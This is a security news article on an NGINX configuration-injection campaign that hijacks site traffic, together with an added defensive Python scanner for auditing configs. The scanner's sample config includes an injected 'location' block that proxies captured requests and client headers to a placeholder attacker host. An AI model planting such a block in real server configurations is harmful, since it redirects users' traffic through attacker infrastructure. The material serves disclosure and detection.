NGINX Security Alert: Hackers Hijack Servers, Redirecting User Traffic (2026)

Hackers Compromise NGINX Servers to Redirect User Traffic: A Detailed Analysis

A sophisticated cyber threat actor has been identified compromising NGINX servers in a campaign that hijacks user traffic and reroutes it through the attacker's backend infrastructure. This attack is particularly insidious as it leverages the legitimate functionality of NGINX, an open-source web traffic management software, to carry out its malicious activities.

The Attack Strategy:
- Targeted NGINX Installations: The campaign targets NGINX installations on websites with Asian top-level domains (.in, .id, .pe, .bd, and .th) and government and educational sites (.edu and .gov).
- Malicious Configuration Injections: Attackers modify existing NGINX configuration files by injecting malicious 'location' blocks that capture incoming requests on attacker-selected URL paths. The injected blocks rewrite the request to include the full original URL and forward the traffic via the 'proxy_pass' directive to attacker-controlled domains.
- Avoiding Detection: The 'proxy_pass' directive is normally used for reverse proxying and load balancing, allowing NGINX to route requests to alternative backend server groups. Because the abuse relies entirely on legitimate functionality, it doesn't trigger security alerts, making it difficult to detect.
- Preserving Legitimacy: Request headers such as 'Host', 'X-Real-IP', 'User-Agent', and 'Referer' are preserved to make the traffic appear legitimate, further complicating detection.

The Multi-Stage Toolkit:
The attack employs a scripted multi-stage toolkit to perform NGINX configuration injections, ensuring precision and control:
- Stage 1: zx.sh - Acts as the initial controller script, downloading and executing subsequent stages. It includes a fallback mechanism for raw HTTP requests if curl or wget are unavailable.
- Stage 2: bt.sh - Targets NGINX configuration files managed by the Baota panel, dynamically selecting injection templates based on server_name values.
- Stage 3: 4zdh.sh - Enumerates common NGINX configuration locations, using parsing tools to prevent corruption. It detects prior injections via hashing and a global mapping file, validating changes before reloading.
- Stage 4: zdh.sh - Focuses on /etc/nginx/sites-enabled, targeting .in and .id domains. It follows a similar configuration testing and reload process, with a forced restart as a fallback.
- Stage 5: ok.sh - Scans compromised configurations, building a map of hijacked domains, injection templates, and proxy targets. Data is exfiltrated to a command-and-control server at 158.94.210[.]227.

Why Detection is Challenging:
These attacks are hard to detect because they don't exploit NGINX vulnerabilities. Instead, they hide malicious instructions in configuration files, which are rarely scrutinized. User traffic still reaches the intended destination, so the detour through attacker infrastructure goes unnoticed without specific monitoring of the configuration itself.
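Because the injected 'location' blocks use only legitimate directives, the practical defence is to audit the configuration files themselves: flag any 'location' block whose 'proxy_pass' points somewhere other than a defined upstream or a local address, and keep a fingerprint of each config so unexpected changes stand out. The script below is an added example written for this page, not code from the article or from the toolkit it describes. It parses a constructed sample config containing one legitimate reverse-proxy block and one injected block of the kind described above (the proxy hostname is a placeholder, not a real indicator), and reports blocks that forward off-host while preserving the 'Host', 'X-Real-IP', 'User-Agent' and 'Referer' headers. The allow-list parameter and file paths are assumptions for illustration.

```python
import glob
import hashlib
import re

# Constructed sample config (not from the article). The second location block
# mirrors the injection pattern: path capture, $request_uri rewrite, off-host
# proxy_pass, and forwarded client headers. The hostname is a placeholder.
SAMPLE_CONF = """
upstream app_backend {
    server 127.0.0.1:8080;
}

server {
    listen 80;
    server_name example.in;

    location / {
        proxy_pass http://app_backend;
        proxy_set_header Host $host;
    }

    # injected block: captures one path and forwards it to an external host
    location /promo {
        rewrite ^ $request_uri;
        proxy_pass http://attacker-proxy.invalid$request_uri;
        proxy_set_header Host $host;
        proxy_set_header X-Real-IP $remote_addr;
        proxy_set_header User-Agent $http_user_agent;
        proxy_set_header Referer $http_referer;
    }
}
"""

# Targets that a proxy_pass may legitimately point at without a matching upstream.
LOCAL_HOSTS = {"127.0.0.1", "localhost", "::1", "unix"}


def strip_comments(text: str) -> str:
    """Drop '#' comments so that commented-out directives are not matched."""
    return "\n".join(line.split("#", 1)[0] for line in text.splitlines())


def upstream_names(text: str) -> set:
    """Names declared with 'upstream NAME { ... }' in this config."""
    return set(re.findall(r"\bupstream\s+([^\s{]+)\s*\{", text))


def _block_body(text: str, open_idx: int) -> str:
    """Return the text between the brace at open_idx and its matching close brace."""
    depth = 0
    for i in range(open_idx, len(text)):
        if text[i] == "{":
            depth += 1
        elif text[i] == "}":
            depth -= 1
            if depth == 0:
                return text[open_idx + 1:i]
    raise ValueError("unbalanced braces in config")


def proxy_target_host(arg: str) -> str:
    """Host part of a proxy_pass argument; '' when the host is a variable or malformed."""
    m = re.match(r"^[A-Za-z][A-Za-z0-9+.-]*://([^/:$?#]+)", arg.strip())
    return m.group(1).lower() if m else ""


def find_suspicious_locations(conf_text: str, allowed_hosts=()) -> list:
    """Report location blocks whose proxy_pass leaves the set of known backends."""
    text = strip_comments(conf_text)
    known = upstream_names(text) | LOCAL_HOSTS | {h.lower() for h in allowed_hosts}
    findings = []
    for m in re.finditer(r"\blocation\s+([^{]*?)\s*\{", text):
        body = _block_body(text, m.end() - 1)
        pp = re.search(r"\bproxy_pass\s+([^;]+);", body)
        if not pp:
            continue
        host = proxy_target_host(pp.group(1))
        if host in known:
            continue
        findings.append({
            "location": m.group(1).strip(),
            "target": pp.group(1).strip(),
            "host": host,  # '' means a variable or unparseable host: review manually
            "rewrites_request_uri": "$request_uri" in body,
            "forwarded_headers": re.findall(r"\bproxy_set_header\s+(\S+)", body),
        })
    return findings


def config_fingerprint(conf_text: str) -> str:
    """SHA-256 of the comment-stripped, whitespace-normalised config, for baselines."""
    norm = re.sub(r"\s+", " ", strip_comments(conf_text)).strip()
    return hashlib.sha256(norm.encode()).hexdigest()


def scan_files(pattern: str = "/etc/nginx/**/*.conf", allowed_hosts=()) -> dict:
    """Scan real config files (assumed path pattern); returns findings per file."""
    results = {}
    for path in glob.glob(pattern, recursive=True):
        with open(path, encoding="utf-8", errors="replace") as fh:
            text = fh.read()
        results[path] = {"fingerprint": config_fingerprint(text),
                         "findings": find_suspicious_locations(text, allowed_hosts)}
    return results


if __name__ == "__main__":
    for f in find_suspicious_locations(SAMPLE_CONF):
        print(f"location {f['location']} -> {f['target']} (headers: {f['forwarded_headers']})")
    print("fingerprint:", config_fingerprint(SAMPLE_CONF))
```

Run against real files with `scan_files()` and compare each fingerprint against a baseline recorded after a known-good deployment; a changed fingerprint plus a finding with an empty or unknown host is the signal to inspect that file before the next reload.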

The Future of IT Infrastructure:
The article concludes with a reference to a Tines guide on the future of IT infrastructure, emphasizing the need for automation and intelligent workflows to keep pace with the rapid evolution of modern IT systems.
